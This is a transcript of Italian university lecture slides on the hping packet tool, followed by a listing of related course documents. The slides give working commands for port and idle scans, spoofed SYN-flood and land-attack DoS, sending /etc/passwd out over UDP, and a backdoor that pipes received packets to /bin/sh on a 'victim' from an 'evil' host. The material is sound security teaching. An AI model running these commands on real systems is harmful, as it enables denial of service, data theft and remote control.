Introduzione ad hping

Dimensione: px
Iniziare la visualizzazioe della pagina:

Download "Introduzione ad hping"

Transcript

1 Introduzione ad hping Andrea Lanzi, Davide Marrone, Roberto Paleari Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Corso di Laurea in Informatica 10 gennaio 2007

2 Sommario 1 Funzionalità hping2 2 scanning servizi di rete 3 Firewall mapping 4 hping come tool DoS 5 Trasferimento file via ICMP, UDP, TCP 6 hping come Trojan

3 Introduzione hping Caratteristiche del tool hping è un network tool capace sia di creare pacchetti di rete sia di sniffare pacchetti. hping gestisce la frammentazione, gestisce pacchetti di grandezza arbitraria e l incapsulamento di protocolli. È portabile su molte architetture UNIX-like: Linux, FreeBSD, NetBSD, OpenBSD, Solaris, MacOs X. È stato creato e sviluppato da un Italiano Salvatore Sanfilippo a.k.a antirez.

4 Funzionalità dello strumento hping Funzionalità hping testing di Firewall. tecnica di scanning avanzata. test delle reti, utilizzando diversi protocolli, TOS, frammentazione. path MTU discovery manuale. traceroute avanzato, con supporto a tutti i protocolli. Remote OS fingerprinting. Remote uptime guessing. TCP/IP stack auditing. strumento didattico per la comprensione dei protocolli di rete.

5 hping come scanner (1) L attività di scanning del sistema permette ad un attaccante di reperire informazioni su quali porte (servizi di rete) sono aperti o filtrati sull host vittima. Esempio di Syn scan # hping -S idea.sec.dico.unimi.it -p 80 HPING idea.sec.dico.unimi.it (ppp ):... len=44 ip= ttl=50 DF id=0 sport=80 flags=sa seq=0 len=44 ip= ttl=50 DF id=0 sport=80 flags=sa seq=1... Se la risposta di ritorno contiene SA (syn/ack) allora la porta è aperta, se la risposta è RA (reset/ack) allora la porta è chiusa.

6 hping come scanner (2) Con hping si possono specificare tutti i flag TCP coinvolti per poter effettuare altri tipi di stealth scan: -F fin imposta FIN flag -S syn imposta SYN flag -R rst imposta RST flag -P push imposta PUSH flag -A ack imposta ACK flag -U urg imposta URG flag -X xmas imposta X flag -F ymas imposta Y flag

7 hping come scanner (3) Per poter effettuare l attività di scanning su diverse porte della macchina vittima tramite hping possiamo eseguire il seguente comando: # hping -S idea.sec.dico.unimi.it -p ++22 HPING idea.sec.dico.unimi.it (ppp ): len=40 ip= ttl=241 DF id=0 sport=22 flags=ra seq=0 len=40 ip= ttl=241 DF id=0 sport=23 flags=ra seq=1...

8 hping come scanner (4) Con hping si possono specificare tutti le opzioni del TCP potendo creare tutte le tecniche di scan: opzioni TCP -s baseport porta sorgente -p destport porta destinazione -w win grandezza finestra TCP -Q seqnum mostra numero di sequenza -b badcheck pachetto con checksum errato -M setseq imposta il numero di sequenza TCP -L setack imposta TCP ack

9 Idle scanning (1) L idle scan è una nuova tipologia di scanning inventata dallo stesso autore di hping, antirez. Ipotesi per L Idle scan (1) tre attori: il server vittima, una macchina chiamata Dumb, e la macchina da cui viene effettuato lo scan. La macchina Dumb, incrementa in modo sequenziale l ID (Identification). La macchina Dumb non deve generare altro tipo di traffico di rete. possibilità di effettuare lo spoofing tra la macchina server e la macchina da cui parte lo scan.

10 Scenario: Idle scan Scenario L Idle scan La macchina da cui parte lo scan, pinga continuamente la macchina Dumb, e vede nei pacchetti di ritorno la risposta con id incrementato di 1. La macchina scan invia un pacchetto spoofato, indirizzo sorgente della macchina Dumb, TCP con syn attivato su una determinata porta all host vittima.

11 Scenario: Idle scan (2) Scenario L Idle scan (2) si possono ricevere due tipo di risposte: SYN/ACK o RST, nel caso di RST, la macchina Dumb non creerà nessun nuovo pacchetto e cosi l ID rimarrà uguale. nel caso del SYN/ACK la macchina Dumb, risponderà con un RST e l ID sarà incrementato di 1.

12 Comandi hping: Idle scan Di seguito si vede la comunicazione con la macchina Dumb e lo spoofing del pacchetto inviato dall attaccante verso la vittima: # hping -I eth0 -SA -r HPING (eth ): SA set, 40 headers + 0 data bytes len=46 ip= flags=r seq=0 ttl=255 id=18 win=0... len=46 ip= flags=r seq=1 ttl=255 id=+1 win=0... len=46 ip= flags=r seq=2 ttl=255 id=+1 win= # hping -I eth0 -a S p ++20 HPING (eth ): S set, 40 headers + 0 data bytes...

13 Comandi hping: Idle scan La continua comunicazione con la macchina Dumb mostra che la porta 21 nel server vittima risulta nello stato open: # hping -I eth0 -r -S p 2000 HPING (eth ): S set, 40 headers + 0 data bytes len=46 ip= flags=ra seq=86 ttl=255 id=+1 win=0... len=46 ip= flags=ra seq=87 ttl=255 id=+2 win=0... (port 21)

14 Firewall mapping con hping Questa tecnica è utilizzata, per poter comprendere una topologia della rete, capire se ci sono firewall, funzionalità di traceroute. # hping3 -z -t 1 -S idea.sec.dico.unimi.it -p 22 TTL 0 during transit from ip= : TTL 0 during transit from ip= : TTL 0 during transit from ip= : TTL 0 during transit from ip= : len=40 ip= ttl=240 DF id=0 sport=22 flags=ra seq=16 win=0 rtt=73.9 ms Con questa tecnica si implementa il firewalking, potendo utilizzare però tutti i protocolli.

15 syn attack hping può essere usato come tool DoS per testare IDS e firewall. Un esempio può essere syn attack. Con il seguente comando si effettua un attacco DoS # hping -a S p 80 -i u1000 -a spoof hostname, setta l indirizzo sorgente del host -S flag syn attivato -p porta destinazione -i intervallo di tempo per la spedizione dei pacchetti, e.g. u1000 (1000 microsecondi).

16 Land attack Un altro esempio di DoS, come consumo di risorse del sistema si può eseguire il seguente comando: # hping -S -a p 80 -i u1000 -a spoof hostname, setta l indirizzo sorgente del host -p porta destinazione -i intervallo di tempo per la spedizione dei pacchetti, e.g. u1000 (1000 microsecondi).

17 Spoofing control hping può essere utilizzato per testare la protezione dello spoofing su un firewall. # hping -S -a p 80 -i u1000 -S flag syn attivato -a indirizzo sorgente -p porta destinazione -i intervallo temporale di invio pacchetti

18 Trasferimento file È inoltre possibile inserire delle signature, valori ascii all interno del campo dati dei pacchetti. [host_a] # hping2 host_b --udp -p 53 -d sign signature --safe --file /etc/passwd [host_b] # hping2 host_a --listen signature --safe --udp sign inserisce la signature ascii nel campo data safe ritrasmissione dei pacchetti persi (e.g. UDP) file dati da trasmettere nel campo data Quando i dati arrivano dalla parte dell host B viene eseguito il dump dalla signature in poi.

19 hping come Trojan (1) può essere usato come backdoor, su una macchina compromessa. Il seguente esempio è preso da un esempio di Antirez stesso. victim# hping -I eth0 --listen mysign /bin/sh evil$ telnet victim 25 Trying Connected to nano ( ). Escape character is ^]. 220 nano.marmoc.net ESMTP Sendmail mysignls;

20 hping come Trojan(2) Nel host vittima verrà mostrato l output del comando victim# hping -I eth0-9 mysign /bin/sh hping2 listen mode bin cdrom etc home local-home mnt root tmp var boot dev export lib lost+found proc sbin usr

Attacchi di rete. Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Anno Accademico 2006/2007

Attacchi di rete. Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Anno Accademico 2006/2007 Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Anno Accademico 2006/2007 Sommario 1 Introduzione al Portscanning 2 3 Sommario 1 Introduzione al Portscanning 2 3 Sommario

Dettagli

Strumenti per la raccolta di informazioni sulla rete - Information gathering -

Strumenti per la raccolta di informazioni sulla rete - Information gathering - Strumenti per la raccolta di informazioni sulla rete - Information gathering - Stefano Suin < Centro di Servizi per la rete di Ateneo Università di Pisa Stefano Suin - Information gathering

Dettagli

Sicurezza delle reti 1. Lezione IV: Port scanning. Stato di una porta. Port scanning. Mattia Monga. a.a. 2010/11

Sicurezza delle reti 1. Lezione IV: Port scanning. Stato di una porta. Port scanning. Mattia Monga. a.a. 2010/11 1 Mattia Lezione IV: Dip. di Informatica e Comunicazione Università degli Studi di Milano, Italia mattia.monga@unimi.it a.a. 2010/11 1 c 2011 M.. Creative Commons Attribuzione-Condividi allo stesso modo

Dettagli

Network Intrusion Detection

Network Intrusion Detection Network Intrusion Detection Maurizio Aiello Consiglio Nazionale delle Ricerche Istituto di Elettronica e di Ingegneria dell Informazione e delle Telecomunicazioni Analisi del traffico E importante analizzare

Dettagli

Sicurezza delle reti. Monga. Ricognizione. Scanning Network mapping Port Scanning NMAP. Le tecniche di scanning. Ping. Sicurezza delle reti.

Sicurezza delle reti. Monga. Ricognizione. Scanning Network mapping Port Scanning NMAP. Le tecniche di scanning. Ping. Sicurezza delle reti. 1 Mattia Dip. di Informatica e Comunicazione Università degli Studi di Milano, Italia mattia.monga@unimi.it Port Lezione IV: Scansioni Port a.a. 2011/12 1 c 2011 12 M.. Creative Commons Attribuzione-Condividi

Dettagli

Sicurezza delle reti. Monga. Ricognizione. Scanning Breve ripasso socket Network mapping Port Scanning NMAP. Le tecniche di scanning

Sicurezza delle reti. Monga. Ricognizione. Scanning Breve ripasso socket Network mapping Port Scanning NMAP. Le tecniche di scanning Sicurezza dei sistemi e delle 1 Mattia Dip. di Informatica Università degli Studi di Milano, Italia mattia.monga@unimi.it Port Lezione V: Scansioni Port a.a. 2015/16 1 cba 2011 15 M.. Creative Commons

Dettagli

Il firewall Packet filtering statico in architetture avanzate

Il firewall Packet filtering statico in architetture avanzate protezione delle reti Il firewall Packet filtering statico in architetture avanzate FABIO GARZIA DOCENTE ESPERTO DI SECURITY UN FIREWALL PERIMETRALE È IL PUNTO CENTRALE DI DIFESA NEL PERIMETRO DI UNA RETE

Dettagli

BOLLETTINO DI SICUREZZA INFORMATICA

BOLLETTINO DI SICUREZZA INFORMATICA STATO MAGGIORE DELLA DIFESA II Reparto Informazioni e Sicurezza Ufficio Sicurezza Difesa Sezione Gestione del Rischio CERT Difesa CC BOLLETTINO DI SICUREZZA INFORMATICA N. 4/2008 Il bollettino può essere

Dettagli

Prof. Mario Cannataro Ing. Giuseppe Pirrò

Prof. Mario Cannataro Ing. Giuseppe Pirrò Prof. Mario Cannataro Ing. Giuseppe Pirrò Footprinting Scansione Enumerazione Exploit Controllo del sistema Raccolta di informazioni sull obbiettivo da attaccare. Determinare il profilo di protezione della

Dettagli

BOLLETTINO DI SICUREZZA INFORMATICA

BOLLETTINO DI SICUREZZA INFORMATICA STATO MAGGIORE DELLA DIFESA II Reparto Informazioni e Sicurezza Ufficio Sicurezza Difesa Sezione Gestione del Rischio CERT Difesa CC BOLLETTINO DI SICUREZZA INFORMATICA N. 3/2008 Il bollettino può essere

Dettagli

Il coltellino svizzero della sicurezza

Il coltellino svizzero della sicurezza Hping Il tool perfetto per analizzare e forgiare pacchetti TCP/IP Il coltellino svizzero della sicurezza Grazie alle sue capacità, il software hping consente di verificare la sicurezza dei dispositivi

Dettagli

Introduzione. Concetti Preliminari Obiettivi. Portscanning. Scan Detector. Modello TCP/IP Three Way Handshake

Introduzione. Concetti Preliminari Obiettivi. Portscanning. Scan Detector. Modello TCP/IP Three Way Handshake Corso di Sicurezza su Reti anno 2001/ 2002 Rilevazione dei Relatori : Capuano Giuseppe Veropalumbo Edoardo Vittore Emanuele Docente del Corso : Prof. De Santis Alfredo Introduzione Concetti Preliminari

Dettagli

Il protocollo TCP. Obiettivo. Procedura

Il protocollo TCP. Obiettivo. Procedura Il protocollo TCP Obiettivo In questo esercizio studieremo il funzionamento del protocollo TCP. In particolare analizzeremo la traccia di segmenti TCP scambiati tra il vostro calcolatore ed un server remoto.

Dettagli

IL LIVELLO TRASPORTO Protocolli TCP e UDP

IL LIVELLO TRASPORTO Protocolli TCP e UDP Reti di Calcolatori ed Internet IL LIVELLO TRASPORTO Protocolli TCP e UDP 5-1 Il Livello Trasporto I servizi del livello Trasporto Le primitive di Trasporto Indirizzamento Protocolli di Trasporto Livello

Dettagli

Politecnico di Milano Dip. Elettronica e Informazione Milano, Italy Esempi di attacchi ai protocolli di rete

Politecnico di Milano Dip. Elettronica e Informazione Milano, Italy Esempi di attacchi ai protocolli di rete Politecnico di Milano Dip. Elettronica e Informazione Milano, Italy Esempi di attacchi ai protocolli di rete Ing. Stefano Zanero - 22/03/2006 Alcuni dei possibili tipi di attacco (1) Attacchi DOS (Denial

Dettagli

Sicurezza delle reti. Monga. Il livello di trasporto. Problemi di sicurezza intrinseci. Riassunto. Porte. Sicurezza delle reti.

Sicurezza delle reti. Monga. Il livello di trasporto. Problemi di sicurezza intrinseci. Riassunto. Porte. Sicurezza delle reti. 1 Mattia Lezione III: I protocolli di base Dip. di Informatica e Comunicazione Università degli Studi di Milano, Italia mattia.monga@unimi.it a.a. 2010/11 1 c 2011 M.. Creative Commons Attribuzione-Condividi

Dettagli

IL LIVELLO TRASPORTO Protocolli TCP e UDP

IL LIVELLO TRASPORTO Protocolli TCP e UDP Reti di Calcolatori IL LIVELLO TRASPORTO Protocolli TCP e UDP D. Talia RETI DI CALCOLATORI - UNICAL 5-1 Il Livello Trasporto I servizi del livello Trasporto Le primitive di Trasporto Indirizzamento Protocolli

Dettagli

Strumenti di raccolta di informazioni su topologia, utenti e servizi di una rete - Information gathering -

Strumenti di raccolta di informazioni su topologia, utenti e servizi di una rete - Information gathering - Strumenti di raccolta di informazioni su topologia, utenti e servizi di una rete - Information gathering - Stefano Suin Centro di Servizi per la rete di Ateneo Università di Pisa Stefano

Dettagli

Prova di Esame - Rete Internet (ing. Giovanni Neglia) Lunedì 7 Febbraio 2005, ore 15.00

Prova di Esame - Rete Internet (ing. Giovanni Neglia) Lunedì 7 Febbraio 2005, ore 15.00 Prova di Esame - Rete Internet (ing. Giovanni Neglia) Lunedì 7 Febbraio 2005, ore 15.00 NB: alcune domande hanno risposta multipla: si richiede di identificare TUTTE le risposte corrette. Cognome: Nome:

Dettagli

Firewall. Generalità. Un firewall può essere sia un apparato hardware sia un programma software.

Firewall. Generalità. Un firewall può essere sia un apparato hardware sia un programma software. Generalità Definizione Un firewall è un sistema che protegge i computer connessi in rete da attacchi intenzionali mirati a compromettere il funzionamento del sistema, alterare i dati ivi memorizzati, accedere

Dettagli

Network Scanning: Tecniche & Politiche

Network Scanning: Tecniche & Politiche Network Scanning: Tecniche & Politiche Gruppo 4 Sebastiano Vascon 788442 me@xwasco.com 1 Cos'è il Network Scanning? E' una tecnica utilizzata per analizzare i computer presenti su una rete. La utilizzano

Dettagli

Esercitazione 05. Sommario. Packet Filtering [ ICMP ] Esercitazione Descrizione generale. Angelo Di Iorio (Paolo Marinelli)

Esercitazione 05. Sommario. Packet Filtering [ ICMP ] Esercitazione Descrizione generale. Angelo Di Iorio (Paolo Marinelli) Sommario Esercitazione 05 Angelo Di Iorio (Paolo Marinelli)! Packet Filtering ICMP! Descrizione esercitazione! Applicazioni utili: " Firewall: wipfw - netfilter " Packet sniffer: wireshark!"#!$#!%&'$(%)*+,')#$-!"#!$#!%&'$(%)*+,')#$-

Dettagli

I protocolli UDP e TCP

I protocolli UDP e TCP I protocolli UDP e TCP A.A. 2005/2006 Walter Cerroni Il livello di trasporto in Internet APP. APP. TCP UDP IP collegamento logico tra diversi processi applicativi collegamento logico tra diversi host IP

Dettagli

Esercitazione 5 Firewall

Esercitazione 5 Firewall Sommario Esercitazione 5 Firewall Laboratorio di Sicurezza 2015/2016 Andrea Nuzzolese Packet Filtering ICMP Descrizione esercitazione Applicazioni da usare: Firewall: netfilter Packet sniffer: wireshark

Dettagli

Introduzione. Scansione dei servizi di rete. Le porte (1) Internet Protocol. Le porte (2) Port Scanning. Cenni preliminari PortScan Satan Saint

Introduzione. Scansione dei servizi di rete. Le porte (1) Internet Protocol. Le porte (2) Port Scanning. Cenni preliminari PortScan Satan Saint Corso di sicurezza su reti a.a.2002/2003 Introduzione Scansione dei servizi Docente del corso: Prof. De Santis Alfredo A cura di: Miele Alessandro Pagnotta Simona Cenni preliminari PortScan Satan Saint

Dettagli

IP Spoofing in Scioltezza

IP Spoofing in Scioltezza IP Spoofing in Scioltezza Autore: ORK Data Pubblicazione: Aprile 2001 Versione Documento: 1.0 Originariamente questo articolo è stato scritto per essere pubblicato sulla pagina del LUG di Gorizia (GOLUG).

Dettagli

Prof. Filippo Lanubile

Prof. Filippo Lanubile Firewall e IDS Firewall Sistema che costituisce l unico punto di connessione tra una rete privata e il resto di Internet Solitamente implementato in un router Implementato anche su host (firewall personale)

Dettagli

Introduzione allo sniffing

Introduzione allo sniffing Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Anno Accademico 2007/2008 Introduzione allo sniffing Roberto Paleari 2-4 Settembre 2008 Roberto Paleari Introduzione

Dettagli

Sommario. Introduzione ai firewall. Firewall a filtraggio dei pacchetti. Il firewall ipfw. Definizione e scopo Classificazione

Sommario. Introduzione ai firewall. Firewall a filtraggio dei pacchetti. Il firewall ipfw. Definizione e scopo Classificazione Sesta Esercitazione Sommario Introduzione ai firewall Definizione e scopo Classificazione Firewall a filtraggio dei pacchetti Informazioni associate alle regole Interpretazione delle regole Il firewall

Dettagli

Transmission Control Protocol

Transmission Control Protocol Transmission Control Protocol Franco Callegati Franco Callegati IC3N 2000 N. 1 Transmission Control Protocol - RFC 793 Protocollo di tipo connection-oriented Ha lo scopo di realizzare una comunicazione

Dettagli

Internet Control Message Protocol ICMP. Struttura di un Messaggio ICMP. Segnalazione degli Errori

Internet Control Message Protocol ICMP. Struttura di un Messaggio ICMP. Segnalazione degli Errori I semestre 03/04 Internet Control Message Protocol ICMP Comunica messaggi di errore o altre situazioni che richiedono intervento Errore di indirizzo o di istradamento Congestione in un router Richiesta

Dettagli

esercizi su sicurezza delle reti 2006-2008 maurizio pizzonia sicurezza dei sistemi informatici e delle reti

esercizi su sicurezza delle reti 2006-2008 maurizio pizzonia sicurezza dei sistemi informatici e delle reti esercizi su sicurezza delle reti 20062008 maurizio pizzonia sicurezza dei sistemi informatici e delle reti 1 supponi i fw siano linux con iptables dai una matrice di accesso che esprima la policy qui descritta

Dettagli

FIREWALL. Firewall - modello OSI e TCP/IP. Gianluigi Me. me@disp.uniroma2.it Anno Accademico 2005/06. Modello OSI. Modello TCP/IP. Application Gateway

FIREWALL. Firewall - modello OSI e TCP/IP. Gianluigi Me. me@disp.uniroma2.it Anno Accademico 2005/06. Modello OSI. Modello TCP/IP. Application Gateway FIREWALL me@disp.uniroma2.it Anno Accademico 2005/06 Firewall - modello OSI e TCP/IP Modello TCP/IP Applicazione TELNET FTP DNS PING NFS RealAudio RealVideo RTCP Modello OSI Applicazione Presentazione

Dettagli

Lezione n.9 LPR- Informatica Applicata

Lezione n.9 LPR- Informatica Applicata Lezione n.9 LPR- Informatica Applicata LINUX Gestione della Rete 3/4/2006 Laura Ricci Laura Ricci 1 INDIRIZZI RISERVATI Alcuni indirizzi all interno di una rete sono riservati: indirizzo di rete e broadcast.

Dettagli

TCP: trasmissione Source port [16 bit] - Identifica il numero di porta sull'host mittente associato alla connessione TCP. Destination port [16 bit] - Identifica il numero di porta sull'host destinatario

Dettagli

Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Anno Accademico 2013/2014. Attacchi di rete.

Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Anno Accademico 2013/2014. Attacchi di rete. Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Anno Accademico 2013/2014 Attacchi di rete Andrea Lanzi 4 Giugno 2013 Andrea Lanzi Attacchi di rete 4 Giugno 2013 1 /

Dettagli

Elementi sull uso dei firewall

Elementi sull uso dei firewall Laboratorio di Reti di Calcolatori Elementi sull uso dei firewall Carlo Mastroianni Firewall Un firewall è una combinazione di hardware e software che protegge una sottorete dal resto di Internet Il firewall

Dettagli

Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Anno Accademico 2012/2013. Attacchi di rete

Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Anno Accademico 2012/2013. Attacchi di rete Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Anno Accademico 2012/2013 Attacchi di rete Srdjan Matic, Aristide Fattori 10 Maggio 2013 Srdjan Matic, Aristide Fattori

Dettagli

OpenVPN: un po di teoria e di configurazione

OpenVPN: un po di teoria e di configurazione OpenVPN: un po di teoria e di configurazione Andrea Lanzi, Davide Marrone, Roberto Paleari Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Anno Accademico 2006/2007

Dettagli

Network Troubleshooting

Network Troubleshooting Network Troubleshooting Introduzione e concetti base di Giovanni Perteghella [Digital Lab] Webb.it 2004 - Padova 1 Copyright Questo insieme di trasparenze è protetto dalle leggi sul copyright e dalle disposizioni

Dettagli

Elementi di Sicurezza e Privatezza Laboratorio 6 - Sniffing. Chiara Braghin chiara.braghin@unimi.it

Elementi di Sicurezza e Privatezza Laboratorio 6 - Sniffing. Chiara Braghin chiara.braghin@unimi.it Elementi di Sicurezza e Privatezza Laboratorio 6 - Sniffing Chiara Braghin chiara.braghin@unimi.it Sniffing (1) Attività di intercettazione passiva dei dati che transitano in una rete telematica, per:

Dettagli

L architettura di TCP/IP

L architettura di TCP/IP L architettura di TCP/IP Mentre non esiste un accordo unanime su come descrivere il modello a strati di TCP/IP, è generalmente accettato il fatto che sia descritto da un numero di livelli inferiore ai

Dettagli

Prova in itinere - Rete Internet (ing. Giovanni Neglia) Mercoledì 23 Maggio 2007, ore 15.00

Prova in itinere - Rete Internet (ing. Giovanni Neglia) Mercoledì 23 Maggio 2007, ore 15.00 Prova in itinere - Rete Internet (ing. Giovanni Neglia) Mercoledì 23 Maggio 2007, ore 15.00 NB: alcune domande hanno risposta multipla: si richiede di identificare TUTTE le risposte corrette. Cognome:

Dettagli

Laboratorio di Networking Operating Systems. Lezione 2 Principali strumenti di diagnostica

Laboratorio di Networking Operating Systems. Lezione 2 Principali strumenti di diagnostica Dipartimento di Informatica - Università di Verona Laboratorio di Networking Operating Systems Lezione 2 Principali strumenti di diagnostica Master in progettazione e gestione di sistemi di rete edizione

Dettagli

Tre catene (chains) di base, si possono definire altre catene (convenzionalmente in minuscolo)

Tre catene (chains) di base, si possono definire altre catene (convenzionalmente in minuscolo) iptables passo-passo Prima del kernel 2.0 ipfwadm, dal kernel 2.2 ipchains, dopo il kernel 2.4 iptables Firewall (packet filtering, Nat (Network Address Translation)) NetFilter (layer del kernel per il

Dettagli

Dispense corso Laboratorio di Internet

Dispense corso Laboratorio di Internet Universitá di Roma Sapienza Dipartimento di Ingegneria Elettronica e delle Telecomunicazioni Dispense corso Laboratorio di Internet Luca Chiaraviglio E-mail: {luca.chiaraviglio}@diet.uniroma1.it 3 marzo

Dettagli

vittorio.prisco@email.it INTRODUZIONE ALLA SICUREZZA DELLE RETI V. Prisco

vittorio.prisco@email.it INTRODUZIONE ALLA SICUREZZA DELLE RETI V. Prisco 1 INTRODUZIONE ALLA SICUREZZA DELLE RETI Vittorio Prisco 2 PERCHÉ LE VULNERABILITÀ La vulnerabilità delle informazioni è in aumento perchè: le informazioni detenute dalle organizzazioni hanno valore superiore

Dettagli

Un sistema di Network Intrusion Detection basato su tcpdump

Un sistema di Network Intrusion Detection basato su tcpdump I INFN Security Workshop Firenze 19-20 Settembre 2000 Un sistema di Network Intrusion Detection basato su tcpdump Massimo Gravino INFN Sezione di Padova Perche` utilizzare un sistema di Network Intrusion

Dettagli

Filtraggio del traffico IP in linux

Filtraggio del traffico IP in linux Filtraggio del traffico IP in linux Laboratorio di Amministrazione di Sistemi L-A Dagli appunti originali di Fabio Bucciarelli - DEIS Cos è un firewall? E un dispositivo hardware o software, che permette

Dettagli

Come si può notare ogni richiesta ICMP Echo Request va in timeout in

Come si può notare ogni richiesta ICMP Echo Request va in timeout in Comandi di rete Utility per la verifica del corretto funzionamento della rete: ICMP Nelle procedure viste nei paragrafi precedenti si fa riferimento ad alcuni comandi, come ping e telnet, per potere verificare

Dettagli

UDP. Livello di Trasporto. Demultiplexing dei Messaggi. Esempio di Demultiplexing

UDP. Livello di Trasporto. Demultiplexing dei Messaggi. Esempio di Demultiplexing a.a. 2002/03 Livello di Trasporto UDP Descrive la comunicazione tra due dispositivi Fornisce un meccanismo per il trasferimento di dati tra sistemi terminali (end user) Prof. Vincenzo Auletta auletta@dia.unisa.it

Dettagli

Corner Banca. Ethical Hacking. Analisi delle Vulnerabilità del sistema di autorizzazione delle transazioni. con carte di credito MasterCard e VISA

Corner Banca. Ethical Hacking. Analisi delle Vulnerabilità del sistema di autorizzazione delle transazioni. con carte di credito MasterCard e VISA Corner Banca Ethical Hacking Analisi delle Vulnerabilità del sistema di autorizzazione delle transazioni con carte di credito MasterCard e VISA Milano Hacking Team S.r.l. http://www.hackingteam.it Via

Dettagli

Livello di Trasporto

Livello di Trasporto Livello di Trasporto Introduzione Problemi e requisiti Livello di trasporto in Internet UDP -UserDatagramProtocol TCP - Transmission Control Protocol Meccanismo di ritrasmissione Controllo del flusso Three-way

Dettagli

Il firewall ipfw. Introduzione ai firewall. Problema: sicurezza di una rete. Definizione di firewall. Introduzione ai firewall

Il firewall ipfw. Introduzione ai firewall. Problema: sicurezza di una rete. Definizione di firewall. Introduzione ai firewall Il firewall ipfw Introduzione ai firewall classificazione Firewall a filtraggio dei pacchetti informazioni associate alle regole interpretazione delle regole ipfw configurazione impostazione delle regole

Dettagli

SPECIFICA DI ASSESSMENT PER I SERVIZI BPOL E BPIOL

SPECIFICA DI ASSESSMENT PER I SERVIZI BPOL E BPIOL SPECIFICA DI ASSESSMENT PER I SERVIZI BPOL E BPIOL ver.: 1.0 del: 21/12/05 SA_Q1DBPSV01 Documento Confidenziale Pagina 1 di 8 Copia Archiviata Elettronicamente File: SA_DBP_05_vulnerability assessment_sv_20051221

Dettagli

SniffJoke eviscerated. http://www.delirandom.net/sniffjoke

SniffJoke eviscerated. http://www.delirandom.net/sniffjoke SniffJoke eviscerated http://www.delirandom.net/sniffjoke SniffJoke eviscerated Come funziona uno sniffer, Come ricostruisce i flussi TCP Quindi si basa su delle assunzioni E se noi le facciam crollare?

Dettagli

Corso di Sicurezza nelle reti a.a. 2009/2010. Soluzioni dei quesiti sulla seconda parte del corso

Corso di Sicurezza nelle reti a.a. 2009/2010. Soluzioni dei quesiti sulla seconda parte del corso Università degli Studi di Parma - Facoltà di Ingegneria Corso di Sicurezza nelle reti a.a. 2009/2010 Soluzioni dei quesiti sulla seconda parte del corso 1) Si consideri lo schema di rete rappresentato

Dettagli

4 - Il livello di trasporto

4 - Il livello di trasporto Università di Bergamo Dipartimento di Ingegneria Gestionale e dell Informazione 4 - Il livello di trasporto Architetture e Protocolli per Internet Servizio di trasporto il livello di trasporto ha il compito

Dettagli

I Firewall. Metodi e strumenti per la Sicurezza informatica. Claudio Telmon claudio@di.unipi.it

I Firewall. Metodi e strumenti per la Sicurezza informatica. Claudio Telmon claudio@di.unipi.it I Firewall Metodi e strumenti per la Sicurezza informatica Claudio Telmon claudio@di.unipi.it Cos è un firewall Un firewall è un sistema, nel senso più ampio del termine, che ha lo scopo di controllare

Dettagli

ARP SPOOFING - Papaleo Gianluca

ARP SPOOFING - Papaleo Gianluca ARP SPOOFING - Papaleo Gianluca ARP spoofing è un attacco che può essere effettuato solo dall interno di una rete locale o LAN (Local Area Network). Questa tecnica si basa su alcune caratteristiche di

Dettagli

Sommario. Configurazione della rete con DHCP. Funzionamento Configurazione lato server Configurazione lato client

Sommario. Configurazione della rete con DHCP. Funzionamento Configurazione lato server Configurazione lato client Seconda esercitazione Sommario Configurazione della rete con DHCP Funzionamento Configurazione lato server Configurazione lato client 2 Sommario Test di connettività ping traceroute Test del DNS nslookup

Dettagli

/00$)#)+#// )#$ $ )""#,+#)#())# "# #$##( #%# $ )/ #//, #/ $#%# $# )""# +# $ +,+#) 1/-- $234&( + 20%)* /&) 6 / /00$)#"( 7 6$

/00$)#)+#// )#$ $ )#,+#)#())# # #$##( #%# $ )/ #//, #/ $#%# $# )# +# $ +,+#) 1/-- $234&( + 20%)* /&) 6 / /00$)#( 7 6$ STATO MAGGIORE DIFESA Reparto Informazioni e Sicurezza Ufficio Sicurezza Difesa !"# $# %$&#" # $'& #()*#%# )+ && +#)* # $# )""#,+#)#-.$ ## /00$)#)+#// )#$ $ )""#,+#)#())# "# #$##( #%# $ )/ #//, #/ $#%#

Dettagli

VULNERABILITA E PROTEZIONE DELLE RETI. Tecniche di Sicurezza dei Sistemi 1

VULNERABILITA E PROTEZIONE DELLE RETI. Tecniche di Sicurezza dei Sistemi 1 VULNERABILITA E PROTEZIONE DELLE RETI Tecniche di Sicurezza dei Sistemi 1 Agenda Debolezze e vulnerabilità delle reti Attacchi a livello 2 (Data link) Attacchi a livello 3 (Rete( Rete) Attacchi a livello

Dettagli

Protocollo ICMP, comandi ping e traceroute

Protocollo ICMP, comandi ping e traceroute Protocollo ICMP, comandi ping e traceroute Internet Control Message Protocol Internet Control Message Protocol (ICMP): usato dagli host, router e gateway per comunicare informazioni riguardanti il livello

Dettagli

vulnerabilità delle reti 2006-2009 maurizio pizzonia sicurezza dei sistemi informatici e delle reti

vulnerabilità delle reti 2006-2009 maurizio pizzonia sicurezza dei sistemi informatici e delle reti vulnerabilità delle reti 1 reti e protocolli vulnerabili gran parte delle vulnerabilità delle reti sono in realtà vulnerabilità dei protocolli inserire la sicurezza in un protocollo significa costringere

Dettagli

Sicurezza delle reti 1. Uso di variabili. Mattia Monga. a.a. 2010/11

Sicurezza delle reti 1. Uso di variabili. Mattia Monga. a.a. 2010/11 1 Mattia Lezione VIII: Sicurezza perimetrale Dip. di Informatica e Comunicazione Università degli Studi di Milano, Italia mattia.monga@unimi.it a.a. 2010/11 1 c 2011 M.. Creative Commons Attribuzione-Condividi

Dettagli

Introduzione (parte III)

Introduzione (parte III) Introduzione (parte III) Argomenti della lezione Ripasso degli argomenti del primo corso: il livello di trasporto, il meccanismo di controllo delle congestioni e le applicazioni Il livello di trasporto

Dettagli

Spett.le Clever Consulting Via Broletto, 39 20121 Milano

